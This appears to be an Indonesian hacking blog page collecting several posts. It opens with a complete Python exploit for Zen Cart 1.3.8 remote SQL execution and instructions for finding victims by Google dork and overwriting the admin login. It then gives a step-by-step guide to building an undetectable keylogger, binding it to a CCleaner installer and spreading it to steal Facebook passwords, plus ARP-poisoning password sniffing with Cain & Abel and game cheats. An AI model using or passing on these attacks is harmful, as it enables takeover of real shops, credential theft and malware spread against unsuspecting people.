BUG ZEN CART

assalamualaikum

Langsung Aja Dibaca

buka google ketik : powered by zen cart ™

kalo udah nih ada pithon :

#!/usr/bin/python

#
# ------- Zen Cart 1.3.8 Remote SQL Execution
# http://www.zen-cart.com/
# Zen Cart Ecommerce - putting the dream of server rooting within reach of anyone!
# A new version (1.3.8a) is avaible on http://www.zen-cart.com/
#
# BlackH 
#

#
# Notes: must have admin/sqlpatch.php enabled
#
# clean the database :
#   DELETE FROM `record_company_info` WHERE `record_company_id` = (SELECT `record_company_id` FROM `record_company` WHERE `record_company_image` = '8d317.php' LIMIT 1);
#   DELETE FROM `record_company` WHERE `record_company_image` = '8d317.php';

import urllib, urllib2, re, sys

a,b = sys.argv,0

def option(name, need = 0):
   global a, b
   for param in sys.argv:
      if(param == '-'+name): return str(sys.argv[b+1])
      b = b + 1
   if(need):
      print '\n#error', "-"+name, 'parameter required'
      exit(1)

if (len(sys.argv) < 2):
   print """
=____________ Zen Cart 1.3.8 Remote SQL Execution Exploit  ____________=
========================================================================
|                  BlackH <Bl4ck.H@gmail.com>                          |
========================================================================
|                                                                      |
| $system> python """+sys.argv[0]+""" -url <url>                                |
| Param: <url>      ex: http://victim.com/site (no slash)              |
|                                                                      |
| Note: blind "injection"                                              |
========================================================================
   """
   exit(1)

url, trick = option('url', 1), "/password_forgotten.php"

while True:
   cmd = raw_input('sql@jah$ ')
   if (cmd == "exit"): exit(1)
   req = urllib2.Request(url+"/admin/sqlpatch.php"+trick+"?action=execute", urllib.urlencode({'query_string' : cmd}))
   if (re.findall('1 statements processed',urllib2.urlopen(req).read())):
      print '>> success (', cmd, ")"
   else:
      print '>> failed, be sure to end with ; (', cmd, ")"

tuh pithon save dgn extensi zen.py

sebelum nya komputer kamu instal dlu pithon nya , kalo blum aja download aja di :http://www.python.org/ftp/python/2.5/python-2.5.msi

kalo udah buka cmd
misal zen.py kamu taruh di desktop bearti cmd kamu arahin ke desktop dlu

kalo udah ketik : zen.py -url htttp://webkorban.com
contohh : zen.py -url http://customizthat.com/2010/admin/ <–enter
trus nanti ada tulisan $sql@jah 
aklo ada tulisan itu bearti masukin perintah : UPDATE admin SET admin_name=’adminz’, admin_email=’admin@shopadmin.com’, admin_pass=’617ec22fbb8f201c366e9848c0eb6925:87′ WHERE admin_id=’1′; trus enter

kalo berhasil maka akan muncul kayak ini :

>> success ( UPDATE admin SET admin_name='adminz', admin_email='admin@shopadmin.
com', admin_pass='617ec22fbb8f201c366e9848c0eb6925:87' WHERE admin_id='1'; )
sql@jah$

contoh nya nih ss nya

Bugs Zen Cart

kalo udah succes, tinggal di url target ditambahin /admin/

kalo succes setiap username sama pasword nya itu adminz : wew

sekian dan terima kasih

Kalo berhasil ada tulisan ini

>> success ( UPDATE admin SET admin_name='adminz', admin_email='admin@shopadmin.
com', admin_pass='617ec22fbb8f201c366e9848c0eb6925:87' WHERE admin_id='1'; )
sql@jah$

Kalo gagal ada tulisan gini

>> failed, be sure to end with ; ( UPDATE admin SET admin_name='adminz', admin_e
mail='admin@shopadmin.com', admin_pass='617ec22fbb8f201c366e9848c0eb6925:87' WHE
RE admin_id='1';

Atau ini

Traceback (most recent call last):
 File "C:\Documents and Settings\Toshiba\Desktop\zen.py", line 53, in
 if (re.findall('1 statements processed',urllib2.urlopen(req).read())):
 File "C:\Python25\lib\urllib2.py", line 121, in urlopen
 return _opener.open(url, data)
 File "C:\Python25\lib\urllib2.py", line 374, in open
 response = self._open(req, data)
 File "C:\Python25\lib\urllib2.py", line 392, in _open
 '_open', req)
 File "C:\Python25\lib\urllib2.py", line 353, in _call_chain
 result = func(*args)
 File "C:\Python25\lib\urllib2.py", line 1101, in http_open
 return self.do_open(httplib.HTTPConnection, req)
 File "C:\Python25\lib\urllib2.py", line 1076, in do_open
 raise URLError(err)
urllib2.URLError: 

Read more »

Cheat Ninja Saga 18 November 2011 ATM EXP + Gold Share

TOOLS :
Fiddler : http://adf.ly/1h3N2

SWF :http://adf.ly/3qUI5
pass RAR : trik-tipsblog.blogspot.com
Pass SWF : 63978DCB04

Cara Menggunakan Fiddler:
[-]Download Fiddler : Cari di google
[-]Instal Fiddler
[-]Setelah Selesai instal, klik start > program > Fiddler
[-]klik AutoResponder [yg gambar petir] > Centang Enable automatic responses dan Unmatched request passthrough
[-]Download file swf
[-]Extrack File Swf
[-]Drag file swf ke dalam tab AutoResponder tersebut
[-]Buka Browser > Ninja-Saga >jgn pilih carakter dolo
[-]Hapus chache
[-]Pilih Carakter > Play
[-]~Enjoy~

Cara Menghapus Chace:
[-]Untuk Mozilla Firefox : Tools -> Options -> Advanced -> Pilih Network Tab -> Clear Now -> Klik OK
[-]Untuk Google Chrome : Pilih icon yang berada di pojok kanan atas (sebelah bintang) -> Options -> Under the Hood -> Clear Browsing Data -> Empty the cache -> Clear Browsing Data

Features :

ATM Exp
ATM Level
Auto Mission
ATM GOLD

Read more »

cara hack lewat keylogger

Cara Hack Account Fb Dari Jarak Jauh

Halo teman-teman saya hari ini akan menjelaskan kepada anda cara hack password Facebook atau akun dari jarak jauh dengan menggunakan keylogger. Sistem kerjanya 100% hack dan Anda dapat dengan mudah hack akun Facebook atau password menggunakan hack ini. Dalam tutorial ini saya akan menjelaskan kepada Anda bagaimana untuk hack Facebook dan password lain dari pengguna manapun menggunakan 100% keylogger FUD. Keylogger dalam tutorial ini kita akan bahas adalah L33ts keylogger dan 100% FUD (sepenuhnya tidak terdeteksi).


Hacking account Facebook sangat mudah dan hanya memerlukan tidak lebih dari 10 menit kerja. Jangan khawatir saya juga akan memberitahu Anda bagaimana untuk melindungi account facebook anda atau password dari hacks tersebut dan hacker. Tapi untuk ini anda harus tahu bagaimana hacker hack account facebook anda. Jadi pertama saya mengajarkan anda cara hack account facebook jarak jauh dan kemudian saya akan memberitahu bagaimana melindungi diri dari ini.

CATATAN: Tutorial ini hanya untuk tujuan Pendidikan yaitu untuk membuat Anda sadar hacker dapat hack account . Tolong jangan menyalahgunakan trick ini. T.B tidak bertanggung jawab atas segala kerusakan yang disebabkan oleh Anda.

Jadi Ways mari kita mulai hacking akun Facebook atau password ....

Langkah-langkah untuk hack account menggunakan keylogger:

1. Membuat Server keylogger untuk hack password.
2. Ekstrak Icon dari installer.
3. Bind server keylogger dengan setup perangkat lunak.
4. Bagaimana untuk menyebarkan keylogger Anda atau mengirimkannya ke teman Anda untuk hack Facebook atau password.

Step 1. Membuat Keylogger Server

1.Download Keylogger
Download
  

2. Ekstrak file, Sekarang Anda akan mendapatkan dua folder:
a. Pertama satu berisi Keylogger dan Binder
b. Kedua alat Berisi sumber daya hacker. (untuk mengekstrak ikon dari installer).
(Matikan AntiVirus Anda Sebelum Mengextrack File)

3. Sekarang buka keylogger. Ini berisi dua file satu untuk email gmail dan lainnya untuk password. Untuk membuat satu account di Gmail uji dan masukkan rincian itu dalam hal ini.

(Click Gambar Untuk Memperbesar)

4. Setelah memasukkan email dan password. Setel interval waktu biasanya ditetapkan 3 menit yaitu setelah berapa banyak waktu yang Anda inginkan untuk menerima log dari pengguna.
5. Sekarang klik pada mengirim email verifikasi. Mail ini adalah untuk menguji bahwa keylogger Anda bekerja dengan benar atau tidak.
6. Setelah Anda mengklik ini Anda akan menerima email konfirmasi di test account yang akan mengkonfirmasi keylogger yang bekerja.
7. Sekarang klik generate untuk mengatur mutex tersebut (setiap kunci rahasia untuk membuat keylogger Anda FUD) dan kemudian klik pada compile server.
8. Sekarang simpan file ke desktop atau di lokasi lain pilihan Anda. Sekarang server Anda sudah siap namun dapat dengan mudah dideteksi.

Langkah 2: Ekstrak file Icon dari installer (hacker sumber daya)


1. Buka folder resource hacker dan buka file reshacker.
2. Sekarang, masuklah ke menu dan buka file setup. Misalkan kita ingin melampirkan keylogger kami untuk file setup CCleaner. Jadi buka setup CCleaner dengan reshacker
3. Sekarang di menu ada satu tindakan tombol klik dan kemudian klik simpan semua reshacker

(Click Gambar Untuk Memperbesar)

4. Sekarang simpan semua reshacker untuk desktop atau di lokasi lain pilihan Anda.
5. Ini terdiri dari dua file satu adalah ikon file dan lainnya adalah file res. Kita hanya perlu file icon, sehingga Anda dapat menghapus file file lain yaitu res.
6. Sekarang kita memiliki Icon of file installer (seperti dibahas di atas setup CCleaner Icon).

Langkah 3: Bind server keylogger dengan software apapun

1. Sekarang Pergi ke folder keylogger dan buka Binder.
2. Sekarang Klik pada tombol + diberikan di bawah ini untuk menambahkan file.
3. Sekarang tambahkan server keylogger dan mengatur perangkat lunak (misalnya dalam kasus kami itu setup CCleaner).
4. Sekarang di menu Binder, Ke Pengaturan. Ada pilih ikon yang kita telah dihasilkan pada langkah sebelumnya dan menetapkan lokasi file output seperti yang ditunjukkan pada gambar.

5. Sekarang pergi lagi ke menu File di Binder dan klik pada file Bind.
6. Sekarang keylogger binded Anda sudah siap. Sekarang Anda harus menyebarkan atau kirimkan ke korban yaitu teman Anda.

Langkah 4: Cara Penyebaran Keylogger atau mengirimkannya ke korban atau teman

1. Sekarang Anda memiliki satu software file setup dengan keylogger terpasang dengan itu (Dalam kasus kami. kita harus setup CCleaner dengan keylogger terpasang dengan itu.
2. Sekarang Spread keylogger Anda melalui forum. Anda mungkin menjadi anggota dari berbagai forum menggunakannya untuk menyebarkan keylogger Anda dalam bentuk posting perangkat lunak. Dapat menggunakan berbagai perangkat lunak untuk menyebarkan mereka bahwa pengguna sering download.
3. Menyebar melalui Pendrives atau drive USB hard. Misalkan seorang teman meminta Anda untuk perangkat lunak memberikan perangkat lunak yang telah terpasang keylogger

Catatan: Anda juga dapat memasang keylogger dengan gambar juga. Tapi itu bisa dideteksi oleh antivirus. Jadi menghindari jenis seperti hacking.
Jadi tidaklah begitu mudah untuk hack account Facebook siapa pun hanya dalam beberapa menit.

Bagaimana melindungi diri dari hacks?

Pencegahan selalu lebih baik daripada mengobati jadi selalu ikuti langkah-langkah:
1. Jangan gunakan perangkat lunak retak dan tidak men-download dari situs web yang tidak sah.
2. Selalu menjaga antivirus dan anti-spyware up to date.
3. Selalu scan file sebelum memindahkan mereka ke USB.
4. Jangan mengizinkan pengguna lain untuk menggunakan PC password yaitu Anda melindunginya.

Read more »

cheat NINJASAGA RECRUIT KAKASHI AND YAMATO

Sebelum download baca dulu ini :
**Karena kemarin ada maintenance & berujung pada building recruit friends yg diganti oleh pihak NS...
maka agar cheat ini ttp jalan ubah nama file/rename aja recruit_friends.swf menjadi recruit_friends_2.swf

file recruit_friends.swf bisa anda jumpai pada file yg akan anda download & ingat tinggal di rename jd recruit_friends_2.swf aja kog, thx to agan aprianta_surbakti atas inponya... ^_<

Download File :
- SWF :  DOWNLOAD 
- FIDDLER : DOWNLOAD

Step By Step : 
-masukkin aja smua file SWF ntu ke fiddler...
-clear browser's cache atau click "Clear Cache" pada fiddler
-Force Traffic seperti biasa...
-Masuk ke Recruit Friends...
-& rekrut aja 2 orang NPC itu scr GRATISSSSS...!!!

Fitur : 
- 2 NPC level 100 free buat anda rekrut
- bisa direkrut MESKI ANDA BUKAN LEVEL 80/berapapun level anda NPC ini tetap setia

NIH SS nya :

Read more »

CHEAT TP FOR NINJASAGA

Equipment:

    1.  Fiddler here
    2.  SWF Files


How:

    1.  Download the first fiddler
    2.  Then Install Fiddler
    3.  Just run the Fiddler
    4.  Click Tab autoresponder (which its icon green lightning)
    5.  Check the "Enable automatic responses" and also "Permit passthrough for unmatched requests"
    6.  Drop it. SWF file that you downloaded earlier to the column autoresponder
    7.  Go to Ninja Saga
    8.  After that clean the caches
    9.  Just select the character who would you play

Read more »

CHEAT POINT BLANK WH+SENJATA V3

DOWNLOAD aja BOY ga di BANNED 10000% NO BANNED

Read more »

cara menggunakan cain and abel

coba - coba maen ma keyloger yang satu ini

namanya adaah Cain n abel...!
oke dah gak usah panjang lebar langsung ja dh

Langkah Kerja

• Download dan install Cain & Abel, klo udah ya tinggal jalanin
• Konfigurasikan network card dengan memilih menu "Configure", pilih network card yang sesuai

• Start sniffer (klik tombol 
• klik tab Sniffer (yang atas), klik kanan di tengah field kosong, pilih Scan MAC Addresses

  

  
  
• Kalo udah dapet MAC address-nya, pilih tab APR (bawah)
• Klik field atas yang kosong, tekan tanda + (di bawah menubar)
• Pilih salah satu (atau semuanya juga bisa sih) IP address, klik OK
• Klik tombol Start/Stop APR di sebelah tombol Start/Stop Sniffer
• Kalo udah, IP address yang lagi diracuni (poisoning) bakal keliatan
• Sekarang, klik tab Password (di bawah), kalo kamu beruntung orang yang lagi login di komputer sebelah bisa keliatan password dan user ID-nya

Read more »

hacking with cain and abel

Cain & Abel adalah sebuah sandi pemulihan alat untuk Sistem Operasi Microsoft. Hal ini memungkinkan pemulihan mudah berbagai jenis password oleh mengendus jaringan, cracking password terenkripsi menggunakan serangan Dictionary, Brute-Force dan Kriptanalisis, rekaman percakapan VoIP, decoding bergegas password, memulihkan jaringan nirkabel kunci, mengungkapkan kotak password, mengungkap password cache dan menganalisis routing yang protokol . Program ini tidak mengeksploitasi suatu perangkat lunak kerentanan atau bug yang tidak bisa diperbaiki dengan sedikit usaha. Ini mencakup beberapa aspek keamanan / kelemahan dalam standar hadir protokol, metode otentikasi dan mekanisme caching; tujuan utama adalah disederhanakan pemulihan password dan mandat dari berbagai sumber, namun juga kapal beberapa "non standard "utilitas untuk Microsoft Windows pengguna.

Cain & Abel adalah alat yang berguna bagi administrator jaringan, guru, keamanan konsultan / profesional, staf forensik, vendor perangkat lunak keamanan, penguji penetrasi profesional dan semua orang yang berencana untuk menggunakannya untuk alasan etis.

Versi terbaru lebih cepat dan berisi banyak fitur baru seperti APR (Arp Poison Routing) yang memungkinkan sniffing pada LAN diaktifkan dan Man-in-the-serangan Tengah. Sniffer dalam versi ini juga dapat menganalisis dienkripsi protokol seperti SSH-1 dan HTTPS, dan berisi filter untuk menangkap mandat dari berbagai mekanisme otentikasi. Versi baru juga kapal routing yang monitor otentikasi protokol dan rute extractors, kamus dan brute-force kerupuk untuk semua algoritma hashing umum dan untuk otentikasi yang spesifik, kata sandi / kalkulator hash, serangan kriptanalisis, Decoder password dan beberapa utilitas tidak begitu umum yang terkait dengan jaringan dan sistem keamanan.

 Ambil Kain dan Habel

Read more »

cheat damage ninja saga with fiddler

U WILL NEED :

1. FIDDLER 2 : DOWNLOAD
2. DAMAGE HACK SWF FILE : DOWNLOAD

HOW TO USE THE HACK

1. OPEN FIDDLER
2. TICK ENABLE AUTOMATIC RESPONSES IN AUTO RESPONDER
3. DRAG THE FILE INTO FIDDLER .
4. CLICK ON CLEAR CACHE
5. GO TO NINJASAGA . AND EQUIPE KUNAI OR SICKEL
6. ENJOY

Read more »

Cheat Gold Emas Ninja Saga Terbaru 18 September 2011

Tool :

• SWF
• Fiddler

Steps :

1. Download Fiddler & SWF
2. Install & jalankan Fiddler
3. Klik Tab AutoResponder (yg icon-nya petir hijau)
4. Centang kotak "Enable automatic responses" dan "Permit passthrough for unmatched request"
5. Drag SWF File ke kolom AutoResponder
6. Masuk ke Ninja Saga
7. Clear Cache browser
8. Pilih karakter yang akan Agan mainkan
9. Masuk ke Academy

Read more »